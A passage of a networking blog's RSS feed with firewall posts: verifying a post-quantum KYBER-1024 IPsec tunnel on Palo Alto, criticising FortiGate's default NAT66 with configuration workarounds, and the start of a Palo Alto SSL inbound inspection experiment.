srcset="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-08-IPsec-Tunnel.png 1000w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-08-IPsec-Tunnel-300x197.png 300w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-08-IPsec-Tunnel-768x504.png 768w" sizes="auto, (max-width: 1000px) 100vw, 1000px" /></p>
<p>These are the (a little weird) <strong>system logs</strong> after the tunnel establishment:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-09-System-Log.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14487" src="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-09-System-Log-1024x435.png" alt="" width="604" height="257" srcset="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-09-System-Log-1024x435.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-09-System-Log-300x127.png 300w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-09-System-Log-768x326.png 768w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-09-System-Log-1536x652.png 1536w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-09-System-Log.png 1889w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packethawk-inline-bypass-network-tap" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketHawk.1208x232.webp" /></a></div>
<h2>Verify!</h2>
<p>Of course, verification is key. Search for the &#8220;KYBER-1024&#8221; entries, respectively ML-KEM, or whatever algorithm you&#8217;ve chosen.</p>
<ul>
<li><code>show vpn ike-sa detail gateway &lt;name&gt;</code></li>
<li><code>show vpn ipsec-sa tunnel &lt;name&gt;</code></li>
</ul>
<p>Examples:</p><pre class="urvanov-syntax-highlighter-plain-tag">weberjoh@pa-lab&gt; show vpn ike-sa detail gateway pa-home

IKE Gateway pa-home, ID 1 2a00:6020:ad0b:8303::2 =&gt; 2a00:6020:ad0b:8303::1
  Current time: Jun.09 13:18:59

IKE SA:
  SPI:  CB7978FA43B5AD61:68F52ADC2342D6F1  Init
        State:      Established
        SN:         3
        Authentication:  PSK, peer PSK
        Proposal:   AES256-GCM16/COMBINED/DH21/KYBER-1024/NONE/NONE/NONE/NONE/NONE/NONE
        ID local:   ipaddr:2a00:6020:ad0b:8303::2
           remote:  ipaddr:2a00:6020:ad0b:8303::1
        ID_i:       IPv6_address:2a00:6020:ad0b:8303::2
        ID_r:       IPv6_address:2a00:6020:ad0b:8303::1
        NAT:        Not detected
        Message ID: rx 343, tx 344
        Liveness check: sending informational packet after idle 5 seconds

        Created:    Jun.09 12:50:25, 28 minutes 35 seconds ago
        Expires:    Jun.09 20:50:25, rekey in 6 hours 24 minutes 5 seconds (24760 sec)

  Child SA 347:
        Tunnel 1    pa-home
        Type:       ESP       Init
        State:      Mature
        Message ID: 0000005A
        Parent SN:  3
        SPI:        8BA354C8 : F2F00F7D
        Algorithm:  AES256-GCM16/COMBINED/DH21/KYBER-1024
        Created:    Jun.09 12:57:47, 21 minutes 13 seconds ago
        Expires:    Jun.09 13:57:47, rekey in 29 minutes 47 seconds (3060 sec)

  Child SA 600:
        Type:       INFO
        State:      Expired
        Message ID: 00000157
        Parent SN:  3




weberjoh@pa-lab&gt;
weberjoh@pa-lab&gt;
weberjoh@pa-lab&gt; show vpn ipsec-sa tunnel pa-home

GwID/client IP  TnID   Peer-Address                            Tunnel(Gateway)                                                                                                                  Algorithm                                                        SPI(in)  SPI(out) life(Sec/KB)             remain-time(Sec)
--------------  ----   ------------                            ---------------                                                                                                                  ---------                                                        -------  -------- ------------             ----------------
1               1      2a00:6020:ad0b:8303::1                  pa-home(pa-home)                                                                                                                 ESP/G256/   /DH21/KYBER-1024                                     8BA354C8 F2F00F7D 3600/Unlimited           2256

Show IPSec SA: Total 1 tunnels found. 1 ipsec sa found.


weberjoh@pa-lab&gt;
weberjoh@pa-lab&gt;
weberjoh@pa-lab&gt;</pre><p>
&nbsp;</p>
<p>Soli Deo Gloria!</p>
<p><span class="text-Kvkr6N truncate-Pc_c1s textS-BC51wP">Photo by <a href="https://unsplash.com/@dynamicwang?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Dynamic Wang</a> on <a href="https://unsplash.com/photos/background-pattern-ERdTJQTtsbE?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></span>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://weberblog.net/pqc-vpn-tunnel-with-palo/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">14472</post-id>	</item>
		<item>
		<title>FortiGate Enables NAT for IPv6 by Default 🤦</title>
		<link>https://weberblog.net/fortigate-enables-nat-for-ipv6-by-default-%f0%9f%a4%a6/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=fortigate-enables-nat-for-ipv6-by-default-%25f0%259f%25a4%25a6</link>
					<comments>https://weberblog.net/fortigate-enables-nat-for-ipv6-by-default-%f0%9f%a4%a6/#comments</comments>
		
		<dc:creator><![CDATA[Johannes Weber]]></dc:creator>
		<pubDate>Wed, 27 May 2026 11:33:28 +0000</pubDate>
				<category><![CDATA[Fortinet]]></category>
		<category><![CDATA[IPv6]]></category>
		<category><![CDATA[Central NAT]]></category>
		<category><![CDATA[fail]]></category>
		<category><![CDATA[FortiGate]]></category>
		<category><![CDATA[IPv4 Thinking]]></category>
		<category><![CDATA[NAT]]></category>
		<category><![CDATA[NAT66]]></category>
		<guid isPermaLink="false">https://weberblog.net/?p=14233</guid>

					<description><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Enables-NAT-for-IPv6-by-Default-🤦🤦🤦-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Enables-NAT-for-IPv6-by-Default-🤦🤦🤦-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Enables-NAT-for-IPv6-by-Default-🤦🤦🤦-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Enables-NAT-for-IPv6-by-Default-🤦🤦🤦-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Enables-NAT-for-IPv6-by-Default-🤦🤦🤦-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Enables-NAT-for-IPv6-by-Default-🤦🤦🤦-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" />Fortinet has a misstep in its IPv6 settings: NAT66 is enabled by default for every policy. Not only does this make no technical sense and go against established best practices, but in my view, there’s an even bigger issue at play here: Given the widespread use of FortiGate devices and the still limited level of &#8230; <a href="https://weberblog.net/fortigate-enables-nat-for-ipv6-by-default-%f0%9f%a4%a6/" class="more-link">Continue reading <span class="screen-reader-text">FortiGate Enables NAT for IPv6 by Default 🤦</span> <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Enables-NAT-for-IPv6-by-Default-🤦🤦🤦-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Enables-NAT-for-IPv6-by-Default-🤦🤦🤦-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Enables-NAT-for-IPv6-by-Default-🤦🤦🤦-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Enables-NAT-for-IPv6-by-Default-🤦🤦🤦-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Enables-NAT-for-IPv6-by-Default-🤦🤦🤦-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Enables-NAT-for-IPv6-by-Default-🤦🤦🤦-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" /><p>Fortinet has a misstep in its IPv6 settings: <strong>NAT66 is enabled by default for every policy</strong>. Not only does this make no technical sense and go against established best practices, but in my view, there’s an even bigger issue at play here:</p>
<p>Given the widespread use of FortiGate devices and the still limited level of IPv6 expertise among many administrators, this default setting risks creating false knowledge. <strong>Many admins may come away believing that NAT for IPv6 is just as normal as it is for IPv4</strong> &#8211; after all, it’s enabled out of the box. And as with any default, people will quickly get used to it.</p>
<p>In this blog post, I’ll therefore look at a few practical workarounds to move away from this approach as quickly as possible.</p>
<p><span id="more-14233"></span></p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetowl-suricata-ids-basiertes-hochleistungs-nsm" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketOwl.1208x232.webp" /></a></div>
<h2>Problem Description</h2>
<p>This default configuration is fundamentally at odds with what IPv6 is meant to be &#8211; essentially the exact opposite of NAT. To recap: <strong>NAT was a workaround for IPv4</strong>, specifically to deal with address exhaustion and allow continued internet connectivity despite limited address space. <strong>The goal of IPv6, in contrast, was to restore true end-to-end connectivity at Layer 3: globally unique, routable IP addresses, with no need for NAT.</strong> (Yes, there are edge cases where NPTv6 &#8211; Network Prefix Translation &#8211; can be used appropriately.)</p>
<div class="su-note"  style="border-color:#d88a59;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;"><div class="su-note-inner su-u-clearfix su-u-trim" style="background-color:#f2a473;border-color:#ffffff;color:#333333;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;">The use of NAT66, especially in combination with PAT, is completely detached from reality. <strong>Avoiding NAT66 is not a “nice to have.” It is the very purpose of IPv6 to eliminate the need for NAT.</strong></div></div>
<p>A single policy for IPv4 and IPv6 (&#8220;consolidated policy&#8221;) only has a single NAT switch. While this is mandatory for IPv4 to function for almost all outgoing connections, it also enables NAT66 for the same source/destination IPv6 addresses:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-Details.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-14427" src="https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-Details.png" alt="" width="795" height="945" srcset="https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-Details.png 795w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-Details-252x300.png 252w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-Details-768x913.png 768w" sizes="auto, (max-width: 795px) 100vw, 795px" /></a>A forward traffic log then looks like this:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-Log.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-14428" src="https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-Log.png" alt="" width="621" height="395" srcset="https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-Log.png 621w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-Log-300x191.png 300w" sizes="auto, (max-width: 621px) 100vw, 621px" /></a></p>
<p>From a configuration perspective, the problem lies in the <code>set nat enable</code> CLI command, which does not distinguish between legacy IP and IPv6 (as the CLI *does* distinguish between both IPs when it comes to the src/dst addresses, which is not a good design as well, by the way):</p><pre class="urvanov-syntax-highlighter-plain-tag">config firewall policy
    edit 1
        set name "fg-lab-61 raus"
        set srcintf "fg-lab-61"
        set dstintf "wan1"
        set action accept
        set srcaddr "all"
        set dstaddr "all"
        set srcaddr6 "all"
        set dstaddr6 "all"
        set service "ALL"
        set logtraffic all
        set nat enable
    next
end</pre><p>
Lastly tested with a FortiGate 70F and <strong>FortiOS v7.6.6</strong>. However, this topic has been around for several FortiOS releases. <a href="https://x.com/webernetz/status/836924674646880257" target="_blank" rel="noopener">I first reported it in 2017</a>, almost 10 years ago. Unfortunately, nothing has changed since then.</p>
<h2>Workaround 1: Central NAT</h2>
<p>From an architect&#8217;s perspective, the central NAT is a very good option. Not only for IPv6, but also for IPv4. Why? Because <strong>it separates the network/routing layer (NAT or not) from the security layer (policy allow or deny)</strong>. If you have hundreds of outgoing policies, there&#8217;s no need to have hundreds of &#8220;nat enable&#8221; switches. One NAT policy per direction fits completely, e.g.: internal -&gt; Internet: SNAT.</p>
<p><strong>Since such NAT policies are configured only for IPv4, no IPv6 NAT would be applied within the same rule. 👍🏻</strong></p>
<p>Enabling Central SNAT:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Central-SNAT-enabled.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14432" src="https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Central-SNAT-enabled-1024x558.png" alt="" width="604" height="329" srcset="https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Central-SNAT-enabled-1024x558.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Central-SNAT-enabled-300x164.png 300w, https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Central-SNAT-enabled-768x419.png 768w, https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Central-SNAT-enabled.png 1031w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>Or via CLI:</p><pre class="urvanov-syntax-highlighter-plain-tag">config system settings
    set central-nat enable
end</pre><p>
Building the needed <strong>outgoing SNAT policies for legacy IP</strong> (note the IPv4 selection at the top):</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Central-SNAT-Policy.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-14433" src="https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Central-SNAT-Policy.png" alt="" width="791" height="835" srcset="https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Central-SNAT-Policy.png 791w, https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Central-SNAT-Policy-284x300.png 284w, https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Central-SNAT-Policy-768x811.png 768w" sizes="auto, (max-width: 791px) 100vw, 791px" /></a></p>
<p>Your policies will then show a &#8220;Custom&#8221; in the NAT column:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Dual-Stack-Policy-with-Central-NAT.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14435" src="https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Dual-Stack-Policy-with-Central-NAT-1024x210.png" alt="" width="604" height="124" srcset="https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Dual-Stack-Policy-with-Central-NAT-1024x210.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Dual-Stack-Policy-with-Central-NAT-300x62.png 300w, https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Dual-Stack-Policy-with-Central-NAT-768x158.png 768w, https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Dual-Stack-Policy-with-Central-NAT.png 1227w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>Outgoing IPv6 sessions will have no NAT anymore. ✅</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Traffic-Log-without-NAT66.png"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-14436" src="https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Traffic-Log-without-NAT66.png" alt="" width="571" height="334" srcset="https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Traffic-Log-without-NAT66.png 571w, https://weberblog.net/wp-content/uploads/2026/06/FortiGate-Traffic-Log-without-NAT66-300x175.png 300w" sizes="auto, (max-width: 571px) 100vw, 571px" /></a></p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packethawk-inline-bypass-network-tap" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketHawk.1208x232.webp" /></a></div>
<h2>Workaround 2: Independent Policies for IPv4 and IPv6</h2>
<p>As an alternative, you can <strong>split each dual-stack policy into two policies: one for IPv4 (with NAT) and one for IPv6 (without NAT)</strong>. While this will work, it obviously doubles the number of policy entries, which is, unfortunately, a really bad design as well. You&#8217;ll end up with two policy sets &#8211; one covering IPv4, the other one covering IPv6 &#8211; which won&#8217;t be congruent in your daily work. <strong>This eventually leads to more security holes in your overall policy, since you will forget one or the other.</strong></p>
<p>However, technically, you would migrate from this:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14429" src="https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-1024x117.png" alt="" width="604" height="69" srcset="https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-1024x117.png 1024w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-300x34.png 300w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-768x88.png 768w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT.png 1389w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>to that:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-Workaround-two-Policies.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14430" src="https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-Workaround-two-Policies-1024x128.png" alt="" width="604" height="76" srcset="https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-Workaround-two-Policies-1024x128.png 1024w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-Workaround-two-Policies-300x38.png 300w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-Workaround-two-Policies-768x96.png 768w, https://weberblog.net/wp-content/uploads/2026/05/FortiGate-Dual-Stack-Policy-with-NAT-Workaround-two-Policies.png 1389w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<h2>Workaround 3: Different Device</h2>
<p>I don’t know whether this is a sensible workaround or not. I also don’t want to engage in unnecessary bashing here. Still, <strong>I wonder how much you can trust a product if it already gets the most basic things completely wrong</strong>. To me, it’s more than just a slightly uneasy feeling &#8211; it’s fundamental.</p>
<p>Another concern is the fact that Fortinet has been aware of this issue for years, yet hasn’t made any meaningful changes. And yes, I am fully aware that FortiGate is one of the most widely deployed firewall platforms, and that this topic “only” touches the networking fundamentals rather than the security features themselves.</p>
<p>Even so, it raises serious questions. When customers ask me in my IPv6 workshops today which product they should choose for a new deployment, I simply cannot recommend FortiGate in good conscience. And that’s not solely because of this NAT issue &#8211; there are other IPv6-related shortcomings as well. (E.g., no address groups for v4/v6 addresses at the same time; DNS64 only globally enabled with “always-synthesize-aaaa” enabled by default; NAT64 only possible with &#8220;IP Pool&#8221; and not &#8220;outgoing interface address&#8221;; NAT46 not available with Central NAT; OSPFv3/BGP only through CLI.)</p>
<p>What would you do?</p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetfalcon-packet-capture" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketFalcon.1208x232.webp" /></a></div>
<h2>@Fortinet: Please fix this 🙏</h2>
<p>Fortinet, if you&#8217;re reading this: <strong>Please reconsider this default behaviour.</strong> Please align your IPv6 implementation with the fundamental design principles of the protocol and disable NAT66 by default. This is not a minor detail &#8211; it directly shapes how administrators understand and deploy IPv6 in real-world networks. By correcting this, you would not only improve your product but also help prevent the continued spread of misconceptions around IPv6.</p>
<p>At the same time, <strong>I would encourage everyone reading this to raise awareness of the issue.</strong> If you are working with FortiGate devices or considering them, please reach out to Fortinet &#8211; through your account teams, support channels, or public forums &#8211; and make your voice heard. Vendor defaults matter, and change is far more likely when customers clearly and collectively highlight where improvements are needed.</p>
<p>Soli Deo Gloria!</p>
<p><span class="text-Kvkr6N truncate-Pc_c1s textS-BC51wP">Photo by <a href="https://unsplash.com/@silverkblack?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Vitaly Gariev</a> on <a href="https://unsplash.com/photos/man-rubbing-his-face-in-front-of-laptop-bl7h_R-PKpU?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></span>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://weberblog.net/fortigate-enables-nat-for-ipv6-by-default-%f0%9f%a4%a6/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">14233</post-id>	</item>
		<item>
		<title>Palo Alto Networks NGFW &#8220;SSL Inbound Inspection&#8221; with different Certificate</title>
		<link>https://weberblog.net/palo-alto-networks-ngfw-ssl-inbound-inspection-with-different-certificate/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=palo-alto-networks-ngfw-ssl-inbound-inspection-with-different-certificate</link>
					<comments>https://weberblog.net/palo-alto-networks-ngfw-ssl-inbound-inspection-with-different-certificate/#comments</comments>
		
		<dc:creator><![CDATA[Johannes Weber]]></dc:creator>
		<pubDate>Tue, 05 May 2026 15:42:43 +0000</pubDate>
				<category><![CDATA[Certificate]]></category>
		<category><![CDATA[Palo Alto Networks]]></category>
		<category><![CDATA[SSL Decryption]]></category>
		<category><![CDATA[SSL Inbound Inspection]]></category>
		<category><![CDATA[TLS]]></category>
		<guid isPermaLink="false">https://weberblog.net/?p=14337</guid>

					<description><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2026/05/Palo-Alto-Networks-NGFW-SSL-Inbound-Inspection-with-different-Certificate-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2026/05/Palo-Alto-Networks-NGFW-SSL-Inbound-Inspection-with-different-Certificate-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2026/05/Palo-Alto-Networks-NGFW-SSL-Inbound-Inspection-with-different-Certificate-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2026/05/Palo-Alto-Networks-NGFW-SSL-Inbound-Inspection-with-different-Certificate-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2026/05/Palo-Alto-Networks-NGFW-SSL-Inbound-Inspection-with-different-Certificate-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2026/05/Palo-Alto-Networks-NGFW-SSL-Inbound-Inspection-with-different-Certificate-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" />I had a use case where I wanted to use the SSL Inbound Inspection on a Palo, but with a different X.509 certificate than the one on the server itself. That is: the backend server has its self-signed (or internal PKI-signed) certificate along with its hostname, while the decryption policy on the Palo uses a &#8230; <a href="https://weberblog.net/palo-alto-networks-ngfw-ssl-inbound-inspection-with-different-certificate/" class="more-link">Continue reading <span class="screen-reader-text">Palo Alto Networks NGFW &#8220;SSL Inbound Inspection&#8221; with different Certificate</span> <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<img width="300" height="169" src="https://weberblog.net/wp-content/uploads/2026/05/Palo-Alto-Networks-NGFW-SSL-Inbound-Inspection-with-different-Certificate-featured-image-300x169.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2026/05/Palo-Alto-Networks-NGFW-SSL-Inbound-Inspection-with-different-Certificate-featured-image-300x169.jpg 300w, https://weberblog.net/wp-content/uploads/2026/05/Palo-Alto-Networks-NGFW-SSL-Inbound-Inspection-with-different-Certificate-featured-image-1024x576.jpg 1024w, https://weberblog.net/wp-content/uploads/2026/05/Palo-Alto-Networks-NGFW-SSL-Inbound-Inspection-with-different-Certificate-featured-image-768x432.jpg 768w, https://weberblog.net/wp-content/uploads/2026/05/Palo-Alto-Networks-NGFW-SSL-Inbound-Inspection-with-different-Certificate-featured-image-1536x864.jpg 1536w, https://weberblog.net/wp-content/uploads/2026/05/Palo-Alto-Networks-NGFW-SSL-Inbound-Inspection-with-different-Certificate-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" /><p>I had a use case where I wanted to use the SSL Inbound Inspection on a Palo, <strong>but with a different X.509 certificate than the one on the server itself</strong>. That is: the backend server has its self-signed (or internal PKI-signed) certificate along with its hostname, while the decryption policy on the Palo uses a publicly trusted signed certificate for the same hostname. Just like a reverse proxy / load balancer / WAF.</p>
<div class="su-note"  style="border-color:#69adc8;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;"><div class="su-note-inner su-u-clearfix su-u-trim" style="background-color:#83c7e2;border-color:#ffffff;color:#333333;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;">TL;DR: While it would be technically feasible, <strong>this configuration is not working</strong>. :(</div></div>
<p><span id="more-14337"></span></p>
<p>To be more precise about the use case: An internal server has one certificate, signed by the internal PKI, but with various DNS hostnames &#8211; internal ones, such as <code>foobar.internal</code>, and external ones, such as <code>myserver.company.com</code>.</p>
<p>Now, <strong>external visitors shall see a publicly trusted certificate</strong> for <code>myserver.company.com</code>, which is different from the one installed on the server itself. This is exactly what a reverse proxy is meant for. But to avoid another component (and since the Palo can do the security part by looking into the TLS session), I wanted to use the SSL Inbound Inspection &#8211; but with a different certificate.</p>
<p>By the way: Why is it still called &#8220;SSL&#8221; and not &#8220;TLS&#8221;? This really triggers me. 😂</p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetowl-suricata-ids-basiertes-hochleistungs-nsm" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketOwl.1208x232.webp" /></a></div>
<p>My lab consisted of the following:</p>
<ul>
<li>PA-440, <strong>PAN-OS 11.2.11</strong></li>
<li>Raspi with a self-signed certificate with CN/SAN of <code>pi10-test5.weberlab.de</code></li>
<li>A Let&#8217;s Encrypt certificate with the same name, <code>pi10-test5.weberlab.de</code></li>
<li>This Let&#8217;s Encrypt certificate, including its private key, was uploaded to the Palo and used in the decryption policy.</li>
</ul>
<p>But, as already noted, this setup is working.</p>
<p>The decryption log showed some &#8220;<strong>certificate verify failed</strong>&#8221; errors:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-01-Decryption-Log.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14345" src="https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-01-Decryption-Log-1024x216.png" alt="" width="604" height="127" srcset="https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-01-Decryption-Log-1024x216.png 1024w, https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-01-Decryption-Log-300x63.png 300w, https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-01-Decryption-Log-768x162.png 768w, https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-01-Decryption-Log-1536x323.png 1536w, https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-01-Decryption-Log.png 1952w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>while the traffic log listed those sessions as &#8220;policy-deny&#8221;, which is not accurate from my point of view: (and those lines were not highlighted in red, though the checkbox was hit)</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-02-Traffic-Log.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14346" src="https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-02-Traffic-Log-1024x196.png" alt="" width="604" height="116" srcset="https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-02-Traffic-Log-1024x196.png 1024w, https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-02-Traffic-Log-300x57.png 300w, https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-02-Traffic-Log-768x147.png 768w, https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-02-Traffic-Log-1536x294.png 1536w, https://weberblog.net/wp-content/uploads/2026/05/PANW-SSL-Inbound-Inspection-with-different-Certificate-02-Traffic-Log-2048x392.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
